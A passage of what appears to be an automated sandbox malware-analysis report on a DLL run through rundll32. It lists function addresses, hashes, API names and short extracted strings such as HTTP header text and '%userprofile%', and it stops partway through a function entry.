                                                                  • Opcode Fuzzy Hash: 22d0e1e140aac874fdce29ddc6509984b94616c0dddbf9d09c1d0fd8dd23a40b
                                                                  • Instruction Fuzzy Hash: 44219031705E8840FBAADBA2991079D6299BB4EFC0F1DC525FD2A437D4DE38C7488311
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00000001800324A4 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: String$??3@Free$??2@AllocFileFindNamePath
                                                                  • String ID:
                                                                  • API String ID: 772211780-0
                                                                  • Opcode ID: 0f2a8a44e8f4c9cff1795b6050ee267adc792dc9736a48368970f0735874c93d
                                                                  • Instruction ID: 2d82027f7e94cb9bcb22be17a4537bea80464cdcc919518384ddf93808e552b3
                                                                  • Opcode Fuzzy Hash: 0f2a8a44e8f4c9cff1795b6050ee267adc792dc9736a48368970f0735874c93d
                                                                  • Instruction Fuzzy Hash: 0521C432611E4482EB529F29D85039EB3A0FB89BF4F198711EA794B6E8DF7CC2448700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180032A90 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: String$??3@Free$??2@AllocFileFindNamePath
                                                                  • String ID:
                                                                  • API String ID: 772211780-0
                                                                  • Opcode ID: f9574987d235c529e2b4a5f79013c743acc608ea97a4ad6ac219f98d4fdede78
                                                                  • Instruction ID: 283ffb4ef057f0283fd59c714cbfe65b47d72467c2882de283dc062303e29699
                                                                  • Opcode Fuzzy Hash: f9574987d235c529e2b4a5f79013c743acc608ea97a4ad6ac219f98d4fdede78
                                                                  • Instruction Fuzzy Hash: 1221B832611A4482EB92DF29D84439EB3A0FB89BF4F198725E779476E9DF7CC6448700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180033068 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: String$??3@Free$??2@AllocFileFindNamePath
                                                                  • String ID:
                                                                  • API String ID: 772211780-0
                                                                  • Opcode ID: 307ce0f3569f6860fa341fe80190f4157af3b04d29387ea8d5fe3f277a62001a
                                                                  • Instruction ID: d9e03fda3b1d153f0bd4bb02b331d59468f410aa3c35072f5ffbfd31d5bd1a6e
                                                                  • Opcode Fuzzy Hash: 307ce0f3569f6860fa341fe80190f4157af3b04d29387ea8d5fe3f277a62001a
                                                                  • Instruction Fuzzy Hash: CD21D632601A4482EB568F29D89139EB3A0FB88BF4F198715EA79476E8DF7CC644C700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018003C614 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$freemalloc
                                                                  • String ID:
                                                                  • API String ID: 112427268-0
                                                                  • Opcode ID: 40d9beaaacbcde50260c436ec66f3643f495edb07ad5aab697476aac6434d7f6
                                                                  • Instruction ID: b8918b2958dc72fb2df8bfc42f6eb5cd02d312beeb31fdbe44136919b98f9138
                                                                  • Opcode Fuzzy Hash: 40d9beaaacbcde50260c436ec66f3643f495edb07ad5aab697476aac6434d7f6
                                                                  • Instruction Fuzzy Hash: 3021517261560987EFD78B24EC85BAF23A0B74C7C0F42E024F95682695DF38D75D8B02
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018001AF10 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Initialize$DeleteEnterLeave
                                                                  • String ID:
                                                                  • API String ID: 3345835275-0
                                                                  • Opcode ID: 342e2fd84596a913fc4e554fed418576577eb4ed1e3f0298ebe73fa484c4289a
                                                                  • Instruction ID: bac7ba2d50b8a8327d60b40396a6a413962eafb144c30abffe047fc5a4d1e144
                                                                  • Opcode Fuzzy Hash: 342e2fd84596a913fc4e554fed418576577eb4ed1e3f0298ebe73fa484c4289a
                                                                  • Instruction Fuzzy Hash: 51212970605A4896FBD29F50EC543D873A8F74EBE4F588229EAA9062A5DF39C74DC700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180070910 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _errno_msizememsetrealloc
                                                                  • String ID:
                                                                  • API String ID: 1716158884-0
                                                                  • Opcode ID: cdc86eb51b19dd29fbdd1dbcc9e2dd10d7135d8ad8bd6beb6c08774733d5e7b7
                                                                  • Instruction ID: eee6de8c671426a850027d5845b58404d35e5bb09185fe1037511193ebe898ed
                                                                  • Opcode Fuzzy Hash: cdc86eb51b19dd29fbdd1dbcc9e2dd10d7135d8ad8bd6beb6c08774733d5e7b7
                                                                  • Instruction Fuzzy Hash: 7201A536715648C1F9869B27A4043D99251AB8CBE0F1DD720BF6A07BCBDE3DC6418700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018007F080 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _errno$memmovememset
                                                                  • String ID:
                                                                  • API String ID: 390474681-0
                                                                  • Opcode ID: 34773165fa903b58a8169a26407c6ce6a53d95ed58fc80f98c13fe875aa60091
                                                                  • Instruction ID: 14b1c1fe1981e25254dae316b1258392d266da5cf9c387dbe4ce1a9d85b7c1af
                                                                  • Opcode Fuzzy Hash: 34773165fa903b58a8169a26407c6ce6a53d95ed58fc80f98c13fe875aa60091
                                                                  • Instruction Fuzzy Hash: 2401D631B1469C42FAE66B56F0003EE5250AB8CBD0F48D020BF4557B8FCE2ECA968740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180064710 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$DeleteEnterFreeLeaveLibrary
                                                                  • String ID:
                                                                  • API String ID: 2347899730-0
                                                                  • Opcode ID: 8ca6170e5c17e41b4a506002b7f4800d109eeedd4070b7d9029d326942e7e76d
                                                                  • Instruction ID: 48e8189d87aa0b979fc36c7d6fe6748a55851d8ea4777fada0444d8c8a940578
                                                                  • Opcode Fuzzy Hash: 8ca6170e5c17e41b4a506002b7f4800d109eeedd4070b7d9029d326942e7e76d
                                                                  • Instruction Fuzzy Hash: 6E117033605B4897EB558F21E9443A97360FB4A7B5F1897249B690BAA0CF78D2798300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018006A900 Relevance: 6.0, APIs: 4, Instructions: 41fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: File_swprintf_c_l$PointerRead
                                                                  • String ID:
                                                                  • API String ID: 1259558433-0
                                                                  • Opcode ID: 430f8c9727729296bcb3ae13e9e40dcee6c79fd9ad2c75f57ecad12c2e0545ef
                                                                  • Instruction ID: 41788915f12d7117270c0c242483de8f49aba279d1603b6e07884f1d05f749b7
                                                                  • Opcode Fuzzy Hash: 430f8c9727729296bcb3ae13e9e40dcee6c79fd9ad2c75f57ecad12c2e0545ef
                                                                  • Instruction Fuzzy Hash: 9B01F53172864881F7929B61AC407DBA3A1F74D7C4F65C022FA5543A64CF3DC748CB20
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018001A3F0 Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: memmove
                                                                  • String ID:
                                                                  • API String ID: 2162964266-0
                                                                  • Opcode ID: f48e30d42f7362a3489efc8b4fb4b1d86e67ce5bf115bf63e3aa4bcefc4ad982
                                                                  • Instruction ID: 461c31f9552aa3729a5e6565f135de1ccc8cc925f396947b96927f6322aea50e
                                                                  • Opcode Fuzzy Hash: f48e30d42f7362a3489efc8b4fb4b1d86e67ce5bf115bf63e3aa4bcefc4ad982
                                                                  • Instruction Fuzzy Hash: A6014B72604B8486DA999F02B84439AA6A4F799FC0F58C034AF9A1BB1ACE7CC2518700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018001D048 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: wcsncmp$FromListPath
                                                                  • String ID: http://$https://
                                                                  • API String ID: 1354619976-1916535328
                                                                  • Opcode ID: f0180345e040584d079c5b24169db75a70be302b2ca9e14ca998ae6b14b2d4e5
                                                                  • Instruction ID: 3b4f654c0190b1c660da69d9b707c9435e3e8476667423005c0f2b5f6a7ba28a
                                                                  • Opcode Fuzzy Hash: f0180345e040584d079c5b24169db75a70be302b2ca9e14ca998ae6b14b2d4e5
                                                                  • Instruction Fuzzy Hash: 21F06D30314B4D81FBD3AB22ED807E92361A74DBC0F08D026BE128B681EE29C79DC701
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018001B0D4 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: FilePath$BackslashModuleNameRemoveSpecmemmovememset
                                                                  • String ID:
                                                                  • API String ID: 1398880316-0
                                                                  • Opcode ID: 124879481a9aa2e00d01ebae9109725b2fe3f2f688dd831a4adbc46c5dd73c81
                                                                  • Instruction ID: 22643bada24b11d976684183b583204a4ee84c872d42e87ba640a329a3643701
                                                                  • Opcode Fuzzy Hash: 124879481a9aa2e00d01ebae9109725b2fe3f2f688dd831a4adbc46c5dd73c81
                                                                  • Instruction Fuzzy Hash: 14015E71214A8882EA60DB21F85539A6320F78A7A9F404221BAAD476E9DF3DC24DCB04
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180073130 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: __pctype_func
                                                                  • String ID: (null)$(null)
                                                                  • API String ID: 3630429742-1601437019
                                                                  • Opcode ID: 0065adc6453a10d9ccc5162ae3c07d97aa8578f8e3d986a6a80ec195f80303d0
                                                                  • Instruction ID: 4da43dc6e52408ab09b3749884352dd554f5e104f70e5d3a12e7d890f492f9a7
                                                                  • Opcode Fuzzy Hash: 0065adc6453a10d9ccc5162ae3c07d97aa8578f8e3d986a6a80ec195f80303d0
                                                                  • Instruction Fuzzy Hash: 0F81F07221068886FBEB8F2880523E967A1F749BD4F44D115FE4A57798DF3ECA89C700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180042CB8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 192COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180042715), ref: 0000000180042D94
                                                                    • Part of subcall function 000000018001AD68: InitializeCriticalSection.KERNEL32(?,?,?,?,?,000000018001AFD5), ref: 000000018001ADCE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharCriticalInitializeMultiSectionWide
                                                                  • String ID: Cache-Control: no-cache$Connection: Keep-Alive
                                                                  • API String ID: 2071930665-2797312137
                                                                  • Opcode ID: 390d372ab0f8ca9c8d35a5c5b59fa4f1daf8a60d35f223fc70caf0e07e2a75eb
                                                                  • Instruction ID: 06b1c2be51b69464b9694ee66dce0eee22d8a6c444c0793ba53430c965e4d999
                                                                  • Opcode Fuzzy Hash: 390d372ab0f8ca9c8d35a5c5b59fa4f1daf8a60d35f223fc70caf0e07e2a75eb
                                                                  • Instruction Fuzzy Hash: 6971B172300E9886EB96DF26D4807DD3760FB89BD8F86C625BE2947B85CF31D6598304
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018003A138 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Xinvalid_argumentstd::_
                                                                  • String ID: map/set<T> too long
                                                                  • API String ID: 909987262-1285458680
                                                                  • Opcode ID: 4f8b5c4a4b7dfd174ba02e61296e3cf7ea921cc7912cdcef76d88542124505ce
                                                                  • Instruction ID: b716ba77de4695a230c5cde56cb36caf30baef682964767987e615475274616d
                                                                  • Opcode Fuzzy Hash: 4f8b5c4a4b7dfd174ba02e61296e3cf7ea921cc7912cdcef76d88542124505ce
                                                                  • Instruction Fuzzy Hash: 17419E32208F8881EAA2CF25E84039E73A4F399BE0F558225EF9D43B95DF39C556C740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018001C31C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: FileFindNamePathwcscmp
                                                                  • String ID: RUNDLL32
                                                                  • API String ID: 3222201028-252960710
                                                                  • Opcode ID: cb23065da29cb40e9b09dc38cb932cba9fa4c45224ed154b04bc2c1aad3b4612
                                                                  • Instruction ID: 4f5a5794d41fc096d520f70cd288b3f3e4e93d0d03317b7f7fc332b0f1d573f2
                                                                  • Opcode Fuzzy Hash: cb23065da29cb40e9b09dc38cb932cba9fa4c45224ed154b04bc2c1aad3b4612
                                                                  • Instruction Fuzzy Hash: 87412932711A5896EB919F39C84479C2360FB49BB8F548312EA3D47BE9DF34CA99C344
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180019224 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentExpandHeapProcessStringsmemset
                                                                  • String ID: %userprofile%
                                                                  • API String ID: 513494641-4287493773
                                                                  • Opcode ID: 6171552488bcb95b8598f81a13bd2917bbfc5c9e60312d18e151e2b76805b3ef
                                                                  • Instruction ID: afa807702e792aa2111ef114b343d602a6a47e8eed4e3e29c3f3eed9658e9f14
                                                                  • Opcode Fuzzy Hash: 6171552488bcb95b8598f81a13bd2917bbfc5c9e60312d18e151e2b76805b3ef
                                                                  • Instruction Fuzzy Hash: 86214A31311A4891EA92DB65EC853DA3360FB88BE4F419215A66D473E1DF38C7898700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018004AF08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ShellExecuteW.SHELL32 ref: 000000018004AF73
                                                                    • Part of subcall function 00000001800495A4: GetTickCount.KERNEL32 ref: 00000001800495AC
                                                                    • Part of subcall function 00000001800495A4: srand.MSVCRT ref: 00000001800495B4
                                                                    • Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495BA
